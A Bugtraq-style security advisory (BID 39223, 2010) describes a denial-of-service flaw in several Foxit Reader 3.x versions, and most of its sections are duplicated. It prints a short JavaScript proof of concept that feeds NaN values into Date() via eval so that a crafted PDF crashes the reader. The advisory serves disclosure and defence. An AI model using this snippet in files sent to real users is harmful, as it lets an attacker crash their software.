Foxit Reader 'Date()' Denial of Service Vulnerability
BID:39223
Info
Foxit Reader 'Date()' Denial of Service Vulnerability
| Bugtraq ID: | 39223 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 06 2010 12:00AM |
| Updated: | Apr 06 2010 12:00AM |
| Credit: | juza |
| Vulnerable: |
Foxit Reader 3.1.1 Build 0928 Foxit Foxit Reader 3.2.1 0401 Foxit Foxit Reader 3.2 0303 Foxit Foxit Reader 3.0.2009 .1301 Foxit Foxit Reader 3.2 Foxit Foxit Reader 3.1.4.1125 Foxit Foxit Reader 3.0 Build 1817 Foxit Foxit Reader 3.0 Build 1506 Foxit Foxit Reader 3.0 |
| Not Vulnerable: | |
Discussion
Foxit Reader 'Date()' Denial of Service Vulnerability
Foxit Reader is prone to a denial-of-service vulnerability because of an input-validation error.
Successfully exploiting this issue may allow attackers to crash the affected application, denying service to legitimate users.
Foxit Reader 3.2.1.0401 is vulnerable; other versions may also be affected.
Foxit Reader is prone to a denial-of-service vulnerability because of an input-validation error.
Successfully exploiting this issue may allow attackers to crash the affected application, denying service to legitimate users.
Foxit Reader 3.2.1.0401 is vulnerable; other versions may also be affected.
Exploit / POC
Foxit Reader 'Date()' Denial of Service Vulnerability
Attackers can exploit this issue by enticing an unsuspecting user into opening a specially crafted file.
The following code is available:
function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}
DoS("DoS");
Attackers can exploit this issue by enticing an unsuspecting user into opening a specially crafted file.
The following code is available:
function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}
DoS("DoS");
Solution / Fix
Foxit Reader 'Date()' Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].